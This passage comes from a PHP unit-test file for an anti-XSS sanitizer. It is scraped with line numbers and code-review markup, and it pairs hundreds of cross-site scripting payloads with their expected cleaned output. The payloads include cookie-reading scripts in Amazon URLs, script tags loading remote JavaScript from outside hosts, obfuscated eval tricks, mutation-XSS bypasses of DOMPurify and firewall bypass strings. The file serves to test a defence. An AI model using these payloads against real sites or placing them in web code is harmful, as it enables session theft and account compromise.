ntry=United+States&Continue=&_pi_legalName=121&_pi_tokenID=A1F3841M9ZHMMV&_pi_pipe=ssrProductAds&_pi [email protected]&_pi_step=1&_pi_areaCode=112&_pi_phone1=121&_pi_userName=1211&_pi_ext=211221212 1&_pi_phone2=1221", |
|
572
|
|
|
'http://www.amazon.com/s?ie=UTF5&keywords="><script>alert(document. cookie)</script>' => 'http://www.amazon.com/s?ie=UTF5&keywords=">', |
|
573
|
|
|
'http://www.amazon.com/gp/digital/rich-media/media-player.html?ie=UTF8& amp;location=javascript:alert(1)&ASIN=B000083JTS' => 'http://www.amazon.com/gp/digital/rich-media/media-player.html?ie=UTF8& amp;location=(1)&ASIN=B000083JTS', |
|
574
|
|
|
'http://r-images.amazon.com/s7ondemand/brochure/flash_brochure.jsp?comp any=ama1&sku=AtHome7&windowtitle=XSS</title><plaintext>' => 'http://r-images.amazon.com/s7ondemand/brochure/flash_brochure.jsp?comp any=ama1&sku=AtHome7&windowtitle=XSS</title><plaintext>', |
|
575
|
|
|
"http://www.amazon.com/s/ref=amb_link_7189562_72/002-2069697-5560831?ie =UTF8&node="/><script>alert('XSS');</script>&a mp;pct-off=25-&hidden-keywords=athletic|outdoor&pf_rd_m=ATVPDK IKX0DER&pf_rd_s=center-5&pf_r" => 'http://www.amazon.com/s/ref=amb_link_7189562_72/002-2069697-5560831?ie =UTF8&node="/>&a mp;pct-off=25-&hidden-keywords=athletic|outdoor&pf_rd_m=ATVPDK IKX0DER&pf_rd_s=center-5&pf_r', |
|
576
|
|
|
'https://sellercentral.amazon.com/gp/on-board/workflow/Registration/log in.html?passthrough/&passthrough/account=soa"><script>alert("XSS") </script>&passthrough/superSource=OAR&passthrough/marketplaceI D=ATVPDKI' => 'https://sellercentral.amazon.com/gp/on-board/workflow/Registration/log in.html?passthrough/&passthrough/account=soa">&passthrough/superSource=OAR&passthrough/marketplaceI D=ATVPDKI', |
|
577
|
|
|
'http://sellercentral.amazon.com/gp/seller/product-ads/registration.htm l?ld="><script>alert(document.cookie)</script>' => 'http://sellercentral.amazon.com/gp/seller/product-ads/registration.htm l?ld=">', |
|
578
|
|
|
'https://sellercentral.amazon.com/gp/change-password/-"><script>alert(d ocument.cookie)</script>-.html' => 'https://sellercentral.amazon.com/gp/change-password/-">-.html', |
|
579
|
|
|
'http://www.amazon.com/s/ref=sr_a9ps_home/?url=search-alias=aps&tag =amzna9-1-20&field-keywords=-"><script>alert(document.cookie)</scr ipt>' => 'http://www.amazon.com/s/ref=sr_a9ps_home/?url=search-alias=aps&tag =amzna9-1-20&field-keywords=-">', |
|
580
|
|
|
'http://www.amazon.com/s/ref=amb_link_7581132_5/102-9803838-3100108?ie= UTF8&node="/><script>alert("XSS");</scr ipt>&keywords=Lips&emi=A19ZEOAOKUUP0Q&pf_rd_m=ATVPDKIKX 0DER&pf_rd_s=left-1&pf_rd_r=1JMP7' => 'http://www.amazon.com/s/ref=amb_link_7581132_5/102-9803838-3100108?ie= UTF8&node="/>&keywords=Lips&emi=A19ZEOAOKUUP0Q&pf_rd_m=ATVPDKIKX 0DER&pf_rd_s=left-1&pf_rd_r=1JMP7', |
|
581
|
|
|
"http://askville.amazon.com/SearchRequests.do?search=\"></script><script >alert('XSS')</script>&start=0&max=10&open=true&closed =true&x=18&y=7" => 'http://askville.amazon.com/SearchRequests.do?search=">&start=0&max=10&open=true&closed =true&x=18&y=7', |
|
582
|
|
|
'https://sellercentral.amazon.com/gp/seller/registration/login.html?ie= UTF8&email=&errors=<script src=http://ha.ckers.org/xss.js?/>&userName=&tokenID=AO9UIQIH15 TE' => 'https://sellercentral.amazon.com/gp/seller/registration/login.html?ie= UTF8&email=&errors=&userName=&tokenID=AO9UIQIH15 TE', |
|
583
|
|
|
'https://sellercentral.amazon.com/gp/seller/registration/login.html?ie= UTF8&email=<script src=http://ha.ckers.org/xss.js?/>&userName=&tokenID=AO9UIQIH15 TE' => 'https://sellercentral.amazon.com/gp/seller/registration/login.html?ie= UTF8&email=&userName=&tokenID=AO9UIQIH15 TE', |
|
584
|
|
|
'address-daytime-phone=&address-daytime-phone-areacode=%24Q%24%2F%3E&address-daytime-phone-ext=&pipel ine-return-directly=1&pipeline-return-handler=fx-pay-pages%2Fmanage-pay-pages%2F&pipeline-return-han dler-type=post&pipeline-return-html=fx%2Fhelp%2Fgetting-started.html&pipeline-type=payee&register-bi lling-address-id=jgmhpujplj&register-credit-card-id=A1V46DGTZUE15I&register-enter-checking-info=no&r egister-epay-registration-status-check=no&register-nickname=pg5of16&register-payment-program=tipping &input-address-daytime-phone-areacode=%22%2F%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3F %2F%3E&input-address-daytime-phone=&input-address-daytime-phone-ext=&input-register-nickname=xss&inp ut-register-enter-checking-info=no&x=0&y=0' => 'address-daytime-phone=&address-daytime-phone-areacode=$Q$/>&address-daytime-phone-ext=&pipel ine-return-directly=1&pipeline-return-handler=fx-pay-pages/manage-pay-pages/&pipeline-return-han dler-type=post&pipeline-return-html=fx/help/getting-started.html&pipeline-type=payee®ister-bi lling-address-id=jgmhpujplj®ister-credit-card-id=A1V46DGTZUE15I®ister-enter-checking-info=no&r egister-epay-registration-status-check=no®ister-nickname=pg5of16®ister-payment-program=tipping &input-address-daytime-phone-areacode="/>&input-address-daytime-phone=&input-address-daytime-phone-ext=&input-register-nickname=xss&inp ut-register-enter-checking-info=no&x=0&y=0', |
|
585
|
|
|
'c=A2H6YBKBHMURHR&t=1&o=4&process_form=1&email_address=%22%2F%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers .org%2Fxss.js%3F%2F%3E&password=&x=0&y=0' => 'c=A2H6YBKBHMURHR&t=1&o=4&process_form=1&email_address="/>&password=&x=0&y=0', |
|
586
|
|
|
"https://affiliate-program.amazon.com/gp/associates/help/glossary/'>\">< SCRIPT/SRC=http://kusomiso.com/xss.js></SCRIPT>" => "https://affiliate-program.amazon.com/gp/associates/help/glossary/'>\">", |
|
587
|
|
|
"https://affiliate-program.amazon.com/gp/associates/help/main.html/'>\"> <SCRIPT/SRC=http://kusomiso.com/xss.js></SCRIPT>" => "https://affiliate-program.amazon.com/gp/associates/help/main.html/'>\"> ", |
|
588
|
|
|
"http://www.amazon.com/gp/daily/ref=\"/><script>alert('XSS $4.99 S&H')</script>" => 'http://www.amazon.com/gp/daily/ref="/>', |
|
589
|
|
|
'http://bilderdienst.bundestag.de/archives/btgpict/search/_%27-document.write%28String.fromCharCode%2860,105,109,103,32,115,114,99,61,34,104,116,116,112,58,47,47,98,108,111,103,46,102,100,105,107,46,111,114,103,47,50,48,49,51,45,48,54,47,51,56,56,57,50,49,56,55,46,106,112,103,34,32,115,116,121,108,101,61,34,112,97,100,100,105,110,103,58,32,50,53,48,112,120,32,51,51,48,112,120,59,10,112,111,115,105,116,105,111,110,58,32,97,98,115,111,108,117,116,101,59,10,122,45,105,110,100,101,120,58,32,49,48,59,34,62%29%29-%27/' => "http://bilderdienst.bundestag.de/archives/btgpict/search/_'-(String.fromCharCode(60,105,109,103,32,115,114,99,61,34,104,116,116,112,58,47,47,98,108,111,103,46,102,100,105,107,46,111,114,103,47,50,48,49,51,45,48,54,47,51,56,56,57,50,49,56,55,46,106,112,103,34,32,115,116,121,108,101,61,34,112,97,100,100,105,110,103,58,32,50,53,48,112,120,32,51,51,48,112,120,59,10,112,111,115,105,116,105,111,110,58,32,97,98,115,111,108,117,116,101,59,10,122,45,105,110,100,101,120,58,32,49,48,59,34,62))-'/", |
|
590
|
|
|
'https://bilderdienst.bundestag.de/archives/btgpict/search/_%27-dOcumEnt.wRite%28String.fromCharCode%2860,105,109,103,32,115,114,99,61,34,104,116,116,112,58,47,47,98,108,111,103,46,102,100,105,107,46,111,114,103,47,50,48,49,51,45,48,54,47,51,56,56,57,50,49,56,55,46,106,112,103,34,32,115,116,121,108,101,61,34,112,97,100,100,105,110,103,58,32,50,53,48,112,120,32,51,51,48,112,120,59,10,112,111,115,105,116,105,111,110,58,32,97,98,115,111,108,117,116,101,59,10,122,45,105,110,100,101,120,58,32,49,48,59,34,62%29%29-%27/' => "https://bilderdienst.bundestag.de/archives/btgpict/search/_'-(String.fromCharCode(60,105,109,103,32,115,114,99,61,34,104,116,116,112,58,47,47,98,108,111,103,46,102,100,105,107,46,111,114,103,47,50,48,49,51,45,48,54,47,51,56,56,57,50,49,56,55,46,106,112,103,34,32,115,116,121,108,101,61,34,112,97,100,100,105,110,103,58,32,50,53,48,112,120,32,51,51,48,112,120,59,10,112,111,115,105,116,105,111,110,58,32,97,98,115,111,108,117,116,101,59,10,122,45,105,110,100,101,120,58,32,49,48,59,34,62))-'/", |
|
591
|
|
|
'<img src=x:alert(alt) onerror=eval(src) alt=0>' => '<img >', |
|
592
|
|
|
'<IMG SRC="j a' . \chr(0) . 'v a ' . "\xe2\x82\xa1" . ' s c r' . "\xf0\x90\x8c\xbc" . 'i p t:alert(\'XSS\');">' => '<IMG src="">', |
|
593
|
|
|
'<IMG alt="中文空白" SRC="j a v a ' . "\xe2\x82\xa1" . ' s c r' . "\xf0\x90\x8c\xbc" . 'i p t:alert(\'XSS\');">' => '<IMG alt="中文空白" src="">', |
|
594
|
|
|
'<script>prompt(1)</script>' => '', |
|
595
|
|
|
'<script>confirm(1)</script>' => '', |
|
596
|
|
|
'<script>var fn=window[490837..toString(1<<5)];fn(atob(\'YWxlcnQoMSk=\'));</script>' => '', |
|
597
|
|
|
'<script>var fn=window[String.fromCharCode(101,118,97,108)];fn(atob(\'YWxlcnQoMSk=\'));</script>' => '', |
|
598
|
|
|
'<script>var fn=window[atob(\'ZXZhbA==\')];fn(atob(\'YWxlcnQoMSk=\'));</script>' => '', |
|
599
|
|
|
'<script>window[490837..toString(1<<5)](atob(\'YWxlcnQoMSk=\'))</script>' => '', |
|
600
|
|
|
'<script>this[490837..toString(1<<5)](atob(\'YWxlcnQoMSk=\'))</script>' => '', |
|
601
|
|
|
'<script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script>' => '', |
|
602
|
|
|
'<script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>' => '', |
|
603
|
|
|
'<script>\'str1ng\'.replace(/1/,alert)</script>' => '', |
|
604
|
|
|
'<script>\'bbbalert(1)cccc\'.replace(/a\w{4}\(\d\)/,eval)</script>' => '', |
|
605
|
|
|
'<script>\'a1l2e3r4t6\'.replace(/(.).(.).(.).(.).(.)/, function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>' => '', |
|
606
|
|
|
'<script>eval(\'\\\\u\'+\'0061\'+\'lert(1)\')</script>' => '', |
|
607
|
|
|
'<script>throw~delete~typeof~prompt(1)</script>' => '', |
|
608
|
|
|
'<script>delete[a=alert]/prompt a(1)</script>' => '', |
|
609
|
|
|
'<script>delete[a=this[atob(\'YWxlcnQ=\')]]/prompt a(1)</script>' => '', |
|
610
|
|
|
'<script>(()=>{return this})().alert(1)</script>' => '', |
|
611
|
|
|
'<script>new function(){new.target.constructor(\'alert(1)\')();}</script>' => '', |
|
612
|
|
|
'<script>Reflect.construct(function(){new.target.constructor(\'alert(1)\')()},[])</script>' => '', |
|
613
|
|
|
'<link/rel=prefetch
import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>' => "<link/rel=prefetch\nimport href=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>", |
|
614
|
|
|
'<link rel="import" href="data:x,<script>alert(1)</script>' => '<link rel="import" href="data:x,', |
|
615
|
|
|
'<script>Array.from`1${alert}3${window}2`</script>' => '', |
|
616
|
|
|
'<script>!{x(){alert(1)}}.x()</script>' => '', |
|
617
|
|
|
'<script>Array.from`${eval}alert\`1\``</script>' => '', |
|
618
|
|
|
'<script>Array.from([1],alert)</script>' => '', |
|
619
|
|
|
'<script>Promise.reject("1").then(null,alert)</script>' => '', |
|
620
|
|
|
'<svg </onload ="1> (_=alert,_(1)) "">' => '<svg </">', |
|
621
|
|
|
'<img onerror="location=\'javascript:=lert(1)\'" src="x">' => '<img src="x">', |
|
622
|
|
|
'<img onerror="location=\'javascript:%61lert(1)\'" src="x">' => '<img src="x">', |
|
623
|
|
|
'<img onerror="location=\'javascript:\x2561lert(1)\'" src="x">' => '<img src="x">', |
|
624
|
|
|
'<img onerror="location=\'javascript:\x255Cu0061lert(1)\'" src="x" >' => '<img src="x" >', |
|
625
|
|
|
'<div data-toggle=tooltip data-html=true title=\'<script>alert(1)</script>\'></div>' => '<div data-toggle=tooltip data-html=true title=\'\'></div>', // Bypassing CSP strict-dynamic via Bootstrap |
|
626
|
|
|
'<div data-role=popup id=\'--><script>alert(1)</script>\'></div>' => '<div data-role=popup id=\'-->\'></div>', // Bypassing sanitizers via jQuery Mobile |
|
627
|
|
|
'<div data-bind="html:\'<script src="//evil.com"></script>\'"></div>' => '<div data-bind="html:\'\'"></div>', // Bypassing sanitizers via Knockout |
|
628
|
|
|
"\n><!-\n<b\n<c d=\"'e><iframe onload=alert(1) src=x>\n<a HREF=\"\">\n" => "\n><!-\n<b\n<c d=\"'e><iframe src=x>\n<a \"\">\n", // CodeIgniter 2017-01 - https://github.com/bcit-ci/CodeIgniter/commit/2ab1c1902711c8b0caf5c3e8f2fa825d72f6755d |
|
629
|
|
|
'<x/><title>&lt;/title&gt;&lt;img src=1 onerror=alert(1)&gt;' => '<x/><title></title><img >', // "Bypassing DOMPurify with mXSS" - http://www.thespanner.co.uk/2018/07/29/bypassing-dompurify-with-mxss/ |
|
630
|
|
|
// Filter Bypass - Tricks (http://brutelogic.com.br/docs/advanced-xss.pdf) |
|
631
|
|
|
// |
|
632
|
|
|
// Spacers |
|
633
|
|
|
'<x%09onxxx=1' => '<x onxxx=1', |
|
634
|
|
|
'<x%0Aonxxx=1' => '<x' . "\nonxxx=1", |
|
635
|
|
|
'<x%0Conxxx=1' => '<x onxxx=1', |
|
636
|
|
|
'<x%0Donxxx=1' => '<x' . "\ronxxx=1", |
|
637
|
|
|
'<x%2Fonxxx=1' => '<x/onxxx=1', |
|
638
|
|
|
|
|
639
|
|
|
'<img alt=\'Right click and share me!\' src=% />' => '<img alt=\'Right click and share me!\' />', |
|
640
|
|
|
|
|
641
|
|
|
'<IMG SRC="jav
ascript:alert(\'XSS\');">' => '<IMG SRC="(\'XSS\');">', |
|
642
|
|
|
'<IMG SRC="j a v a s c r i p t:alert(\'XSS\');">' => '<IMG SRC="(\'XSS\');">', |
|
643
|
|
|
'<IMG SRC="j a v a s c r i p t:alert(\'XSS\');">' => '<IMG src="">', |
|
644
|
|
|
// Quotes |
|
645
|
|
|
'<x 1=\'1\'onxxx=1' => '<x 1=\'1\'onxxx=1', |
|
646
|
|
|
'<x 1="1"onxxx=1' => '<x 1="1"onxxx=1', |
|
647
|
|
|
// Mimetism |
|
648
|
|
|
'<x </onxxx=hack (closing tag)' => '<x </onxxx=hack (closing tag)', |
|
649
|
|
|
'<http://onxxx%3Dhack/ (URL)' => '<http://onxxx=hack/ (URL)', |
|
650
|
|
|
'<x </onxxx=1 (closing tag)' => '<x </onxxx=1 (closing tag)', |
|
651
|
|
|
'<http://onxxx%3D1/ (URL)' => '<http://onxxx=1/ (URL)', |
|
652
|
|
|
// Combo |
|
653
|
|
|
'<x%2F1=">%22OnClick%3D1' => '<x/1=">"=1', |
|
654
|
|
|
// Location Based Payloads |
|
655
|
|
|
// |
|
656
|
|
|
// Location |
|
657
|
|
|
'<svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/. |
|
658
|
|
|
source+location.hash[1]+1+location.hash[2]>#()' => '<svg |
|
659
|
|
|
source+location.hash[1]+1+location.hash[2]>#()', |
|
660
|
|
|
'<svg id=t:alert(1) name=javascrip onload=location=name+id>' => '<svg id=t:alert(1) name=javascrip >', |
|
661
|
|
|
'<javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! |
|
662
|
|
|
#*/alert(1)' => '<javascript >:/*click me! |
|
663
|
|
|
#*/alert(1)', // javas + cript:"click me! + #"-alert(1) |
|
664
|
|
|
'*/"<j"-alert(9)<!-- onclick=location=innerHTML+previousSibling. |
|
665
|
|
|
nodeValue+outerHTML>javascript:/*click me' => '*/"<j"-alert(9)<!-- |
|
666
|
|
|
nodeValue+outerHTML>/*click me', |
|
667
|
|
|
'<alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript:1/*click me! |
|
668
|
|
|
*/</alert(1)<!-- -->' => '<alert(1)<!-- >/*click me! |
|
669
|
|
|
*/</alert(1)<!-- -->', |
|
670
|
|
|
'<javas onclick=location=tagName+innerHTML+URL>cript:"-\'click me!</javas>#\'- |
|
671
|
|
|
alert(1)' => '<javas >cript:"-\'click me!</javas>#\'- |
|
672
|
|
|
alert(1)', |
|
673
|
|
|
// Location Self |
|
674
|
|
|
'p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>' => 'p=<j >?p=<svg/>', |
|
675
|
|
|
'p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id>' => 'p=<svg id=?p=<svg/ >', |
|
676
|
|
|
// Location Self Plus |
|
677
|
|
|
'p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body. |
|
678
|
|
|
textContent>click me!' => 'p=%26p=%26lt;svg/=alert(1)><j |
|
679
|
|
|
textContent>click me!', |
|
680
|
|
|
'p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>' => 'p=<j >&p=<svg/>', |
|
681
|
|
|
'<object data=javascript:confirm()><a href=javascript:confirm()>click here<script src=//14.rs></script><script>confirm()</script>' => '<object data=()><a >click here', // Without event handlers |
|
682
|
|
|
'<svg/onload=confirm()><iframe/src=javascript:alert(1)>' => '<svg/><iframe/src=(1)>', // Without space (https://github.com/s0md3v/AwesomeXSS) |
|
683
|
|
|
'<svg onload=confirm()><img src=x onerror=confirm()>' => '<svg ><img >', // Without slash (/) |
|
684
|
|
|
'<script>confirm()</script>' => '', // Without equal sign (=) |
|
685
|
|
|
'<svg onload=confirm()//' => '<svg ', // Without closing angular bracket (>) |
|
686
|
|
|
'<script src=//14.rs></script><svg onload=co\u006efirm()><svg onload=z=co\u006efir\u006d,z()>' => '<svg ><svg >', // Without alert, confirm, prompt |
|
687
|
|
|
'<x onclick=confirm()>click here <x ondrag=aconfirm()>drag it' => '<x >click here <x >drag it', // Without a Valid HTML tag |
|
688
|
|
|
'<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">' => '<svg></p><style><a ><img >">', // DOMPurify 2.0.0 bypass using mutation XSS (2019) (https://research.securitum.com/dompurify-bypass-using-mxss/) |
|
689
|
|
|
'<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>' => "<dETAILS\nopen\n x>", // Akamai GHost XSS bypass (2018) (https://twitter.com/s0md3v/status/1056447131362324480) |
|
690
|
|
|
|
|
691
|
|
|
'<iframe srcdoc=\'<meta http-equiv="refresh" content="5;url=(link: https://www.google.com/) google.com " /><script>alert(document.domain + "\n\n" + document.cookie);</script>\'/>' => '<iframe srcdoc=\'<meta http-equiv="refresh" content="5;url=(link: https://www.google.com/) google.com " />\'/>', // MS Edge Iframe srcdoc UXSS POC (2018) (https://mobile.twitter.com/Windowsrcer/status/1071131620856320000?s=19) |
|
692
|
|
|
|
|
693
|
|
|
'%0ajavascript:`/*\"/*--><svg onload=\'/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//\'">`' => "\n" . "/*\\\"/*--><svg ='/*</template></noembed></noscript></style></title></textarea><html >`", // Awesome Polyglots (https://github.com/s0md3v/AwesomeXSS) |
|
694
|
|
|
' |
|
695
|
|
|
Wordfence 7.4.2<a href=javascript:alert(1)> |
|
696
|
|
|
Sucuri CloudProxy (POST only)<a href=javascript:confirm(1)> |
|
697
|
|
|
ModSecurity CRS 3.2.0 PL1<a href="jav%0Dascript:alert(1)"> |
|
698
|
|
|
' => ' |
|
699
|
|
|
Wordfence 7.4.2<a > |
|
700
|
|
|
Sucuri CloudProxy (POST only)<a > |
|
701
|
|
|
ModSecurity CRS 3.2.0 PL1<a href="(1)"> |
|
702
|
|
|
', // 2019-12 - https://twitter.com/brutelogic/status/1209086328383660033 |
|
703
|
|
|
]; |
|
704
|
|
|
|
|
705
|
|
View Code Duplication |
foreach ($testArray as $before => $after) { |
|
|
|
|
|
|
706
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
707
|
|
|
static::assertTrue($this->antiXss->isXssFound(), 'testing: ' . $before); |
|
708
|
|
|
} |
|
709
|
|
|
|
|
710
|
|
|
// test for php < OR > 5.3 |
|
711
|
|
|
|
|
712
|
|
|
$testArray = [ |
|
713
|
|
|
'<DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">' => '<DIV >', |
|
714
|
|
|
'If you like entities... <a href="javascript:'<script src=//Ð.pw>⃒</script>⃒'">CLICK</a>' => 'If you like entities... <a href="\'⃒⃒\'">CLICK</a>', // https://twitter.com/0x6D6172696F/status/629754114084175872 |
|
715
|
|
|
'<iframe srcdoc="<svg onload=alert(1)>⃒"></iframe>' => '<iframe srcdoc="<svg >⃒"></iframe>', |
|
716
|
|
|
'<a href="javascript:'<svg onload=alert(1)>⃒'">CLICK</a>' => '<a >⃒\'">CLICK</a>', |
|
717
|
|
|
]; |
|
718
|
|
|
|
|
719
|
|
|
for ($i = 0; $i < 2; ++$i) { // keep this loop, for quick performance tests |
|
720
|
|
|
foreach ($testArray as $before => $after) { |
|
721
|
|
|
static::assertSame($after, $this->antiXss->xss_clean($before), 'testing: ' . $before); |
|
722
|
|
|
} |
|
723
|
|
|
} |
|
724
|
|
|
} |
|
725
|
|
|
|
|
726
|
|
|
/** |
|
727
|
|
|
* https://github.com/s0md3v/AwesomeXSS |
|
728
|
|
|
*/ |
|
729
|
|
|
public function testAwesomePayload() |
|
730
|
|
|
{ |
|
731
|
|
|
/** @noinspection JSUndeclaredVariable */ |
|
732
|
|
|
$testString = "<A/hREf=\"j%0aavas%09cript%0a:%09con%0afirm%0d``\">z |
|
733
|
|
|
<d3\"<\"/onclick=\"1>[confirm``]\"<\">z |
|
734
|
|
|
<d3/onmouseenter=[2].find(confirm)>z |
|
735
|
|
|
<details open ontoggle=confirm()> |
|
736
|
|
|
<script y=\"><\">/*<script* */prompt()</script |
|
737
|
|
|
<w=\"/x=\"y>\"/ondblclick=`<`[confir\u006d``]>z |
|
738
|
|
|
<a href=\"javascript%26colon;alert(1)\">click |
|
739
|
|
|
<a href=javascript:alert(1)>click |
|
740
|
|
|
<script/\"<a\"/src=data:=\".<a,[8].some(confirm)> |
|
741
|
|
|
<svg/x=\">\"/onload=confirm()// |
|
742
|
|
|
<--`<img/src=` onerror=confirm``> --!> |
|
743
|
|
|
<svg%0Aonload=%09((pro\u006dpt))()// |
|
744
|
|
|
<sCript x>(((confirm)))``</scRipt x> |
|
745
|
|
|
<svg </onload =\"1> (_=prompt,_(1)) \"\"> |
|
746
|
|
|
<!--><script src=//14.rs> |
|
747
|
|
|
<embed src=//14.rs> |
|
748
|
|
|
<script x=\">\" src=//15.rs></script> |
|
749
|
|
|
<!'/*\"/*/'/*/\"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //> |
|
750
|
|
|
<iframe/src \/\/onload = prompt(1) |
|
751
|
|
|
<x oncut=alert()>x |
|
752
|
|
|
<svg onload=write()>"; |
|
753
|
|
|
|
|
754
|
|
|
$expected = '<A/hREf="">z |
|
755
|
|
|
<d3"<"/<">z |
|
756
|
|
|
<d3/>z |
|
757
|
|
|
<details open > |
|
758
|
|
|
<">/*"/=`<`[confir\u006d``]>z |
|
759
|
|
|
<a href="(1)">click |
|
760
|
|
|
<a >click |
|
761
|
|
|
|
|
762
|
|
|
<svg/x=">"/=confirm()// |
|
763
|
|
|
<--`<img/> --!> |
|
764
|
|
|
<> |
|
765
|
|
|
<> (_=prompt,_(1)) ""> |
|
766
|
|
|
<!--> |
|
767
|
|
|
<embed src=//14.rs> |
|
768
|
|
|
" src=//15.rs> |
|
769
|
|
|
<Image SrcSet=K */; //> |
|
770
|
|
|
<iframe/src \/\/ |
|
771
|
|
|
<x >x |
|
772
|
|
|
<svg >'; |
|
773
|
|
|
|
|
774
|
|
|
static::assertSame($expected, $this->antiXss->xss_clean($testString)); |
|
775
|
|
|
} |
|
776
|
|
|
|
|
777
|
|
|
public function testStringReplaceViaRegEx() |
|
778
|
|
|
{ |
|
779
|
|
|
$testString = "<IMG SRC=\"jav	ascript:alert)'XSS');\">"; |
|
780
|
|
|
|
|
781
|
|
|
static::assertSame('<IMG SRC=")\'XSS\');">', $this->antiXss->xss_clean($testString)); |
|
782
|
|
|
} |
|
783
|
|
|
|
|
784
|
|
|
public function testRemoveEvilAttributes() |
|
785
|
|
|
{ |
|
786
|
|
|
$testArray = [ |
|
787
|
|
|
'<IMG SRC=\'vbscript:msgbox("XSS")\'>' => '<IMG SRC=\'vbscript:msgbox("XSS")\'>', |
|
788
|
|
|
'<form onsubmit=\'alert(1)\'><input onfocus=alert(2) name=attributes>123</form>' => '<form ><input name=attributes>123</form>', |
|
789
|
|
|
'<Video> <source onerror = "javascript: alert (XSS)">' => '<Video> <source >', |
|
790
|
|
|
]; |
|
791
|
|
|
|
|
792
|
|
|
foreach ($testArray as $test => $expected) { |
|
793
|
|
|
static::assertSame($expected, $this->invokeMethod($this->antiXss, '_remove_evil_attributes', [$test])); |
|
794
|
|
|
} |
|
795
|
|
|
|
|
796
|
|
|
// --- |
|
797
|
|
|
|
|
798
|
|
|
$testString = '<li FSCommand="bar" style="list-style-image: url(javascript:alert(0))">'; |
|
799
|
|
|
|
|
800
|
|
|
static::assertSame('<li >', $this->antiXss->xss_clean($testString)); |
|
801
|
|
|
|
|
802
|
|
|
// --- |
|
803
|
|
|
|
|
804
|
|
|
$this->antiXss->removeEvilAttributes(['style', 'FSCommand']); |
|
805
|
|
|
|
|
806
|
|
|
static::assertSame('<li FSCommand="bar" style="list-style-image: url((0))">', $this->antiXss->xss_clean($testString)); |
|
807
|
|
|
|
|
808
|
|
|
// --- |
|
809
|
|
|
|
|
810
|
|
|
// reset |
|
811
|
|
|
$this->antiXss->addEvilAttributes(['style', 'FSCommand']); |
|
812
|
|
|
|
|
813
|
|
|
static::assertSame('<li >', $this->antiXss->xss_clean($testString)); |
|
814
|
|
|
} |
|
815
|
|
|
|
|
816
|
|
|
public function testHtmlNoXssFile() |
|
817
|
|
|
{ |
|
818
|
|
|
$testString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_no_v1.html'); |
|
819
|
|
|
$resultString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_no_v1_clean.html'); |
|
820
|
|
|
|
|
821
|
|
|
static::assertSame( |
|
822
|
|
|
\str_replace(["\r\n", "\r"], "\n", $resultString), |
|
823
|
|
|
\str_replace(["\r\n", "\r"], "\n", $this->antiXss->xss_clean($testString)), |
|
824
|
|
|
'testing: ' . $testString |
|
825
|
|
|
); |
|
826
|
|
|
} |
|
827
|
|
|
|
|
828
|
|
View Code Duplication |
public function testHtmlXssFile() |
|
|
|
|
|
|
829
|
|
|
{ |
|
830
|
|
|
$testString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_v1.html'); |
|
831
|
|
|
$resultString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_v1_clean.html'); |
|
832
|
|
|
|
|
833
|
|
|
static::assertSame( |
|
834
|
|
|
\str_replace(["\r\n", "\r"], "\n", \trim($resultString)), |
|
835
|
|
|
\str_replace(["\r\n", "\r"], "\n", $this->antiXss->xss_clean(\trim($testString))), |
|
836
|
|
|
'testing: ' . $testString |
|
837
|
|
|
); |
|
838
|
|
|
} |
|
839
|
|
|
|
|
840
|
|
View Code Duplication |
public function testHtmlXssFileIssue41() |
|
|
|
|
|
|
841
|
|
|
{ |
|
842
|
|
|
$testString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_issue_sample_post_small.html'); |
|
843
|
|
|
$resultString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_issue_sample_post_small.html'); |
|
844
|
|
|
|
|
845
|
|
|
static::assertSame( |
|
846
|
|
|
\str_replace(["\r\n", "\r"], "\n", \trim($resultString)), |
|
847
|
|
|
\str_replace(["\r\n", "\r"], "\n", \html_entity_decode($this->antiXss->xss_clean(\trim($testString)))), |
|
848
|
|
|
'testing: ' . $testString |
|
849
|
|
|
); |
|
850
|
|
|
} |
|
851
|
|
|
|
|
852
|
|
|
public function testSvgXssFileV1() |
|
853
|
|
|
{ |
|
854
|
|
|
$testString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_v1.svg'); |
|
855
|
|
|
$resultString = UTF8::file_get_contents(__DIR__ . '/fixtures/xss_v1_clean.svg'); |
|
856
|
|
|
|
|
857
|
|
|
static::assertSame( |
|
858
|
|
|
\str_replace(["\n\r", "\r\n", "\n"], "\n", $resultString), |
|
859
|
|
|
\str_replace(["\n\r", "\r\n", "\n"], "\n", $this->antiXss->xss_clean($testString)), |
|
860
|
|
|
'testing: ' . $testString |
|
861
|
|
|
); |
|
862
|
|
|
} |
|
863
|
|
|
|
|
864
|
|
|
public function testAwesomeXssCollection() |
|
865
|
|
|
{ |
|
866
|
|
|
$testString = ' |
|
867
|
|
|
<details open ontoggle=confirm()> |
|
868
|
|
|
<script y="><">/*<script* */prompt()</script |
|
869
|
|
|
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z |
|
870
|
|
|
